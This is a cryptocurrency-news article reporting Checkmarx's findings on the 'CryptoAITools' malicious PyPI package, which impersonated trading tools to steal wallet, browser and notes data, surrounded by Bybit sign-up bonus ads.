Register on the Bybit exchange and receive a bonus of $4000.
Kryptowaluty

Invasive malware campaign on Python repository takes aim at cryptocurrency wallet data

The target of this campaign is mainly developers and cryptocurrency enthusiasts who may accidentally install these packages without realizing the danger.

Date: 2024-10-30 Author: Łukasz Michałek
Invasive malware campaign on Python repository takes aim at cryptocurrency wallet data

Checkmarx ‘s research team has uncovered a new invasive crypto malware campaign in the Python Package Index (PyPI) repository. Scammers are impersonating cryptocurrency trading tools to steal sensitive data and empty victims’ cryptocurrency wallets.

Findings revealed that a malicious package named “CryptoAITools” was uploaded to PyPI and GitHub repositories, impersonating legitimate cryptocurrency trading tools.

The attacker used a fake graphical user interface (GUI) to distract victims while the malware performed malicious actions. In addition, the malware automatically activated itself after installation, attacking both Windows and macOS operating systems.

“The CryptoAITools malware uses a sophisticated multi-step infection process, using a fake website to deliver its secondary payloads. After the initial infection via the PyPI package, the malware starts executing scripts separately for macOS and Windows systems.

CTA
Register for ByBit

“These scripts are responsible for downloading additional malicious components from the fake site,” – wrote the research team.

Checkmarx researcher Yehuda Gelb said in an analysis published earlier this month that the attacker targeted users of Atomic, Trust Wallet, Metamask, Ronin, TronLink, Exodus and other well-known cryptocurrency wallets.

“Presenting themselves as tools for mining mnemonic phrases and decrypting wallet data, these packages appeared to offer valuable functionality for cryptocurrency users involved in recovery or wallet management.”

In addition, the CryptoAITools malware conducted an extensive data theft operation, attacking browser data such as saved passwords and browsing history. On macOS systems, the malware also attacked data from Apple Notes and Stickies applications.

The attackers began by harvesting data stored in users’ home folders. The exfiltration script for each file changes, and the malware uploads the file to gofile.io using their API.

The attacker then sends the infected download link via the Telegram bot, using various tactics to lure potential victims.

“Our further investigation into this campaign revealed that the attacker used multiple infection vectors and social engineering tactics,” – the team noted. “The attack is not limited to the malicious Python package on PyPI, but extends to other platforms and methods.”

The CryptoAITools malware campaign has serious consequences for victims and the broader cryptocurrency community, including immediate financial losses. The impact also includes long-term identity theft and privacy risks.

CTA
Register for ByBit
Łukasz Michałek
Łukasz Michałek
Founder of the rapidly developing cryptocurrency channel "Biblia Kryptowalut" on YouTube. He also co-creates the Arena Trading group with Marek. Łukasz is fascinated and passionate about blockchain technology and cryptocurrencies, which constitute the central element of his activity in the cryptocurrency industry.
Register on the Bybit exchange and receive a bonus of $4000.
Get Bonus